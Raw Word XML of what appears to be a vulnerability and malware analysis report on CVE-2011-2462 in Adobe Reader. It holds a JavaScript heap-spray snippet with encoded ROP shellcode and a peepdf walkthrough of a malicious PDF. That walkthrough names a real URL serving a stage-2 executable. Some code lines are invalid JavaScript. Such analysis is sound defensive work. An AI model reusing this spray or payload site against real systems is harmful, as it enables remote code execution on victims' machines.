          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3830" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00933564" w:rsidRDefault="00933564" w:rsidP="00D928B5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>VirtualAlloc Chunk Header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3831" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00933564" w:rsidRDefault="00933564" w:rsidP="00933564">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Heap header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AB4F55">
            <w:r>
              <w:t>0xXXX10020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AB4F55">
            <w:r>
              <w:t>….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AB4F55">
            <w:r>
              <w:t>0xXXX10c0c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1915" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009A6CB8" w:rsidRDefault="009A6CB8" w:rsidP="00AB4F55">
            <w:r>
              <w:t>ROP Gadget</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1915" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009A6CB8" w:rsidRDefault="009A6CB8" w:rsidP="00AB4F55">
            <w:r>
              <w:t>ROP Gadget</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1915" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009A6CB8" w:rsidRDefault="009A6CB8" w:rsidP="00AB4F55">
            <w:r>
              <w:t>ROP Gadget</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1916" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009A6CB8" w:rsidRDefault="009A6CB8" w:rsidP="00AB4F55">
            <w:r>
              <w:t>ROP Gadget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AB4F55">
            <w:r>
              <w:t>….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6" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009A6CB8" w:rsidRDefault="009A6CB8" w:rsidP="00AB4F5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AB4F55">
            <w:r>
              <w:t>0xXXX20000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5" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009A6CB8" w:rsidRDefault="009A6CB8" w:rsidP="00AB4F55">
            <w:r>
              <w:t>0c0c0c0c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1916" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009A6CB8" w:rsidRDefault="009A6CB8" w:rsidP="00AB4F5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A84E72" w:rsidP="00D928B5">
            <w:r>
              <w:t>0xXXX2</w:t>
            </w:r>
            <w:r w:rsidR="009A6CB8">
              <w:t>0000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A84E72" w:rsidP="00D928B5">
            <w:r>
              <w:t>0xXXX2</w:t>
            </w:r>
            <w:r w:rsidR="009A6CB8">
              <w:t>0010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A84E72" w:rsidP="00D928B5">
            <w:r>
              <w:t>0xXXX2</w:t>
            </w:r>
            <w:r w:rsidR="009A6CB8">
              <w:t>0020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D928B5">
            <w:r>
              <w:t>….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A84E72" w:rsidP="00D928B5">
            <w:r>
              <w:t>0xXXX2</w:t>
            </w:r>
            <w:r w:rsidR="009A6CB8">
              <w:t>0c0c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1915" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009A6CB8" w:rsidRDefault="009A6CB8" w:rsidP="00D928B5">
            <w:r>
              <w:t>ROP Gadget</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1915" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009A6CB8" w:rsidRDefault="009A6CB8" w:rsidP="00D928B5">
            <w:r>
              <w:t>ROP Gadget</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1915" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009A6CB8" w:rsidRDefault="009A6CB8" w:rsidP="00D928B5">
            <w:r>
              <w:t>ROP Gadget</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1916" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009A6CB8" w:rsidRDefault="009A6CB8" w:rsidP="00D928B5">
            <w:r>
              <w:t>ROP Gadget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D928B5">
            <w:r>
              <w:t>….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  <w:tr w:rsidR="009A6CB8" w:rsidTr="00BB5BDF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1915" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1" w:themeFill="accent1" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="009A6CB8" w:rsidRDefault="009A6CB8" w:rsidP="00D928B5">
            <w:r>
              <w:t>0xXXX</w:t>
            </w:r>
            <w:r w:rsidR="00A84E72">
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>0000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5" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009A6CB8" w:rsidRDefault="009A6CB8" w:rsidP="00D928B5">
            <w:r>
              <w:t>0c0c0c0c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1916" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009A6CB8" w:rsidRDefault="009A6CB8" w:rsidP="00D928B5">
            <w:r>
              <w:t>0c0c0c0c</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00CE10C4" w:rsidRDefault="00CE10C4" w:rsidP="00AB4F55"/>
    <w:p w:rsidR="008C68C8" w:rsidRDefault="008C68C8" w:rsidP="00AB4F55">
      <w:r>
        <w:t xml:space="preserve">Using heap spray to spray a specific amount of 0x0c0c0c0c’s or a </w:t>
      </w:r>
      <w:r w:rsidR="0038024A">
        <w:t>NOP sled</w:t>
      </w:r>
      <w:r>
        <w:t>, an attacker can then place the ROP chain accurately at all 0xXXXX0c0c0, and by doing this repeatedly for a large number of iterations, the address location 0x0c0c0c0c would contain the ROP chain as required.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB" w:rsidP="00AB4F55">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>An example of a JavaScript spray for this purpose is given below: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C78EB" w:rsidTr="00BC78EB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB" w:rsidP="00BC78EB">
            <w:r>
              <w:t>shellcode = "%u6f29%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u6f29%u4a80";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB" w:rsidP="00BC78EB">
            <w:r>
              <w:t>padding = unescape("%u0c0c");</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB" w:rsidP="00BC78EB">
            <w:r>
              <w:t>padding += padding;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB" w:rsidP="00BC78EB"/>
          <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB" w:rsidP="00BC78EB">
            <w:r>
              <w:t>while (padding.length + 28 &lt; 0x10000) padding += padding;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB" w:rsidP="00BC78EB"/>
          <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB" w:rsidP="00BC78EB">
            <w:r>
              <w:t>offset_to_0c0c = 0x0c0c - 0x24;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB" w:rsidP="00BC78EB">
            <w:r>
              <w:t>0x10000_size_payload = padding.substring(0, offset_to_0c0c / 2);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB" w:rsidP="00BC78EB"/>
          <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB" w:rsidP="00BC78EB">
            <w:r>
              <w:t>payload += shellcode;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB" w:rsidP="00BC78EB">
            <w:r>
              <w:t>payload += padding;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB" w:rsidP="00BC78EB"/>
          <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB" w:rsidP="00BC78EB">
            <w:r>
              <w:t>size_of_0x10000 = 0x10000;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB" w:rsidP="00BC78EB">
            <w:r>
              <w:t>trimmed_payload_to_0x10000 = payload.substring(0, size_of_0x10000 / 2);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB" w:rsidP="00BC78EB"/>
          <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB" w:rsidP="00BC78EB">
            <w:r>
              <w:t>for (; trimmed_payload_to_0x10000.length &lt; 0x40000 + 0x40000;) trimmed_payload_to_0x10000 += trimmed_payload_to_0x10000;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB" w:rsidP="00BC78EB"/>
          <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB" w:rsidP="00BC78EB">
            <w:r>
              <w:t>final_payload = trimmed_payload_to_0x10000.substring(0, 0x80000);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB" w:rsidP="00BC78EB"/>
          <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB" w:rsidP="00BC78EB">
            <w:r>
              <w:t>var x = new Array();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB" w:rsidP="00BC78EB"/>
          <w:p w:rsidR="00BC78EB" w:rsidRDefault="00BC78EB" w:rsidP="00BC78EB">
            <w:r>
              <w:t>for (i = 0; i &lt; 0x1f0 ; i++) x[i] = final_payload + "s";</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="005D2D3E" w:rsidRPr="003E5AE6" w:rsidRDefault="008B6FF1" w:rsidP="00AB4F55">
      <w:r>
        <w:t>With the combination of techniques of Heap Feng Shui</w:t>
      </w:r>
      <w:r w:rsidR="00BE58DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE0BDF">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:t>Targeted Heap Spray, the vulnerability can then be reliably exploited. An example of a working JavaScript Heap Spray has been provided in the appendix of this document.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B23EC" w:rsidRDefault="005B23EC">
      <w:pPr>
        <w:rPr>
          <w:smallCaps/>
          <w:spacing w:val="5"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A54B4B" w:rsidRDefault="00B45E0C" w:rsidP="00B45E0C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc438718800"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidR="00B25F0C">
        <w:t xml:space="preserve">How is </w:t>
      </w:r>
      <w:r w:rsidR="00B05810">
        <w:t>the JavaScript payload</w:t>
      </w:r>
      <w:r w:rsidR="00B84679">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B7730">
        <w:t>embedded</w:t>
      </w:r>
      <w:r w:rsidR="00F3264E">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="005C6880">
        <w:t>initiated</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="004518EB" w:rsidRDefault="004518EB" w:rsidP="004518EB">
      <w:r>
        <w:t>The following example is taken from a malware sample based</w:t>
      </w:r>
      <w:r w:rsidR="00580260">
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidR="008123FC">
        <w:t>CVE_2011_2462.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00637602" w:rsidRDefault="00637602" w:rsidP="00637602">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5775694" cy="3622515"/>
            <wp:effectExtent l="19050" t="0" r="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71" cy="36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02" w:rsidRPr="004518EB" w:rsidRDefault="00637602" w:rsidP="00637602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8</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> – peepdf result on the malicious PDF.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7023E" w:rsidRDefault="00992FD4">
      <w:r>
        <w:t>There are 17 Objects in this PDF</w:t>
      </w:r>
      <w:r w:rsidR="00C7023E">
        <w:t xml:space="preserve">. Running peepdf on the pdf shows </w:t>
      </w:r>
      <w:r w:rsidR="00FE11DC">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00C7023E">
        <w:t>few suspicious objects.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE11DC" w:rsidRDefault="00FE11DC">
      <w:r>
        <w:t>Both objects 13 and 16 are encoded by deflate compression.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA5F4A" w:rsidRDefault="00FE11DC">
      <w:r>
        <w:t>Object 16 contains JavaScript and object 13 contains an u3d compressed file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E35BAF" w:rsidRDefault="00E35BAF">
      <w:r>
        <w:t>Object 3 contains two methods of executing elements, /AcroForm and /OpenAction.</w:t>
      </w:r>
      <w:r w:rsidR="00BD3BC5">
        <w:t xml:space="preserve">The AcroForm element points to object 2 containing a XFR array pointing to object 1. However, there is nothing suspicious in object 1.The OpenAction element triggers the JavaScript code in Object #16. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2F88" w:rsidRDefault="00BD3BC5" w:rsidP="00A54B4B">
      <w:r>
        <w:t xml:space="preserve">The JavaScript </w:t>
      </w:r>
      <w:r w:rsidR="00CC6844">
        <w:t xml:space="preserve">code </w:t>
      </w:r>
      <w:r w:rsidR="008B2F88">
        <w:t>does a heap spray with a shellcode embedded in the script itself. The shell</w:t>
      </w:r>
      <w:r w:rsidR="00AF611F">
        <w:t xml:space="preserve">code contains </w:t>
      </w:r>
      <w:r w:rsidR="00C3371A">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="000305F4">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00C3371A">
        <w:t xml:space="preserve"> URL, </w:t>
      </w:r>
      <w:r w:rsidR="008B2F88">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00247F90">
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidR="008B2F88">
        <w:t>firatbalik.com.tr/wp-content/plugins/ganteng.exe”</w:t>
      </w:r>
      <w:r w:rsidR="00B6475E">
        <w:t xml:space="preserve"> (still alive at</w:t>
      </w:r>
      <w:r w:rsidR="00FD62F1">
        <w:t xml:space="preserve"> point of writing</w:t>
      </w:r>
      <w:r w:rsidR="00B6475E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00AF611F">
        <w:t>, which I believe is used</w:t>
      </w:r>
      <w:r w:rsidR="008B2F88">
        <w:t xml:space="preserve"> to download </w:t>
      </w:r>
      <w:r w:rsidR="00C3371A">
        <w:t>a stage 2</w:t>
      </w:r>
      <w:r w:rsidR="004E2167">
        <w:t xml:space="preserve"> executable</w:t>
      </w:r>
      <w:r w:rsidR="00C3371A">
        <w:t xml:space="preserve"> for</w:t>
      </w:r>
      <w:r w:rsidR="00790F29">
        <w:t xml:space="preserve"> fur</w:t>
      </w:r>
      <w:r w:rsidR="00C3371A">
        <w:t>ther exploitation</w:t>
      </w:r>
      <w:r w:rsidR="00790F29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE0CFA" w:rsidRDefault="00AE0CFA" w:rsidP="00A54B4B">
      <w:r>
        <w:t>After performing a heap spray, the JavaScript code attempts to redirect to page 3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D47DD1" w:rsidRDefault="004452B3" w:rsidP="00A54B4B">
      <w:r>
        <w:t>From object 6, we see that page 3 is at object 9, and in object 9, we find an annotation pointing to object 14, which contains a 3D object pointing to object 13 which we identified earlier.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3B5E" w:rsidRPr="009C6523" w:rsidRDefault="00263629" w:rsidP="00BF7EAE">
      <w:r>
        <w:t xml:space="preserve">Vulnerability in </w:t>
      </w:r>
      <w:r w:rsidR="00B85621">
        <w:t>U3D allows attackers to control the</w:t>
      </w:r>
      <w:r w:rsidR="00DF31DE">
        <w:t xml:space="preserve"> EIP to point to the heap</w:t>
      </w:r>
      <w:r w:rsidR="007E78DE">
        <w:t xml:space="preserve"> area</w:t>
      </w:r>
      <w:r w:rsidR="00DF31DE">
        <w:t xml:space="preserve"> which has been sprayed</w:t>
      </w:r>
      <w:r w:rsidR="00AD6C8E">
        <w:t xml:space="preserve"> prior</w:t>
      </w:r>
      <w:r w:rsidR="00DF31DE">
        <w:t xml:space="preserve"> using</w:t>
      </w:r>
      <w:r w:rsidR="00B363F4">
        <w:t xml:space="preserve"> the embedded JavaScript</w:t>
      </w:r>
      <w:r w:rsidR="00DF31DE">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C6438B">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00135FDF" w:rsidRDefault="000616F5" w:rsidP="00135FDF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc438718805"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidR="00135FDF">
        <w:t>Appendices</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="00866F31" w:rsidRDefault="00F2046A" w:rsidP="00866F31">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc438718806"/>
      <w:r>
        <w:t xml:space="preserve">6.1 </w:t>
      </w:r>
      <w:r w:rsidR="00866F31">
        <w:t>Heap Feng Shui</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="00866F31" w:rsidRPr="00866F31" w:rsidRDefault="000A4F2C" w:rsidP="00866F31">
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="00866F31" w:rsidRPr="00A72B37">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.blackhat.com/presentations/bh-europe-07/Sotirov/Presentation/bh-eu-07-sotirov-apr19.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00135FDF" w:rsidRPr="00135FDF" w:rsidRDefault="00F2046A" w:rsidP="00135FDF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc438718807"/>
      <w:r>
        <w:t xml:space="preserve">6.2 </w:t>
      </w:r>
      <w:r w:rsidR="00135FDF">
        <w:t>U3D File Format</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="00135FDF" w:rsidRDefault="00135FDF">
      <w:r>
        <w:t xml:space="preserve">More information on U3D file format can be found here: </w:t>
      </w:r>
      <w:r w:rsidR="00866F31">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00180DA7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.ecma-international.org/publications/files/ECMA-ST/ECMA-363%204th%20Edition.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00874229" w:rsidRDefault="00F2046A" w:rsidP="00874229">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc438718808"/>
      <w:r>
        <w:t xml:space="preserve">6.3 </w:t>
      </w:r>
      <w:r w:rsidR="009716B1">
        <w:t>Metasploit plugin</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="009716B1" w:rsidRDefault="000A4F2C" w:rsidP="00874229">
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidR="009716B1" w:rsidRPr="00180DA7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://downloads.securityfocus.com/vulnerabilities/exploits/50922.rb</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003868DF" w:rsidRPr="007F3007" w:rsidRDefault="00295BFF" w:rsidP="00295BFF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc438718809"/>
      <w:r>
        <w:t xml:space="preserve">6.4 </w:t>
      </w:r>
      <w:r w:rsidR="00E269A7">
        <w:t>Details of the</w:t>
      </w:r>
      <w:r w:rsidR="003868DF">
        <w:t xml:space="preserve"> object and Vftable that should be</w:t>
      </w:r>
      <w:r w:rsidR="003A196E">
        <w:t xml:space="preserve"> have been</w:t>
      </w:r>
      <w:r w:rsidR="003868DF">
        <w:t xml:space="preserve"> initialized</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="003868DF" w:rsidRDefault="003868DF" w:rsidP="003868DF">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="195262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DF" w:rsidRDefault="003868DF" w:rsidP="003868DF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12</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00E431A5">
        <w:t>EAX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> contains value returned from get_object_to_vftable and is copied into </w:t>
      </w:r>
      <w:r w:rsidR="006431C9">
        <w:t>ECX</w:t>
      </w:r>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="006431C9">
        <w:t>EBX</w:t>
      </w:r>
      <w:r>
        <w:t>*4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003868DF" w:rsidRDefault="003868DF" w:rsidP="003868DF">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2238375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DF" w:rsidRDefault="003868DF" w:rsidP="003868DF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13</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> – address stored in </w:t>
      </w:r>
      <w:r w:rsidR="00906633">
        <w:t>EAX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is from rt3d.dll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003868DF" w:rsidRDefault="003868DF" w:rsidP="003868DF">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="1466850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8DF" w:rsidRDefault="003868DF" w:rsidP="003868DF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00DE657F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> – 0x001e1994 from figure 8 points to a virtual function table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003868DF" w:rsidRDefault="003868DF" w:rsidP="003868DF">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="181927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07" w:rsidRPr="007F3007" w:rsidRDefault="003868DF" w:rsidP="007F3007">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00DE657F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00E65A48">
        <w:t>0x2fef550 from</w:t>
      </w:r>
      <w:r w:rsidR="00906633">
        <w:t xml:space="preserve"> EAX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of figure 7, is see</w:t>
      </w:r>
      <w:r w:rsidR="00792F58">
        <w:t>n here in the function that is responsible for execution of arbitrary code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B3E2E" w:rsidRDefault="005B3E2E">
      <w:pPr>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A00B2A" w:rsidRDefault="00295BFF" w:rsidP="00A00B2A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc438718810"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6.5</w:t>
      </w:r>
      <w:r w:rsidR="00216DDB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0054480D">
        <w:t>JavaS</w:t>
      </w:r>
      <w:r w:rsidR="007A02E9">
        <w:t>cript Heap S</w:t>
      </w:r>
      <w:r w:rsidR="00D2286F">
        <w:t>pray</w:t>
      </w:r>
      <w:r w:rsidR="00FB3193">
        <w:t>Example</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9576"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00B2A" w:rsidRPr="00F0292C" w:rsidTr="00A00B2A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:t>var padding;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:t>varbbb, ccc, ddd, eee, fff, ggg, hhh;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:t>varpointers_a, i;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
            <w:r>
              <w:t>var x = new Array();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00870714" w:rsidRDefault="00870714" w:rsidP="00870714">
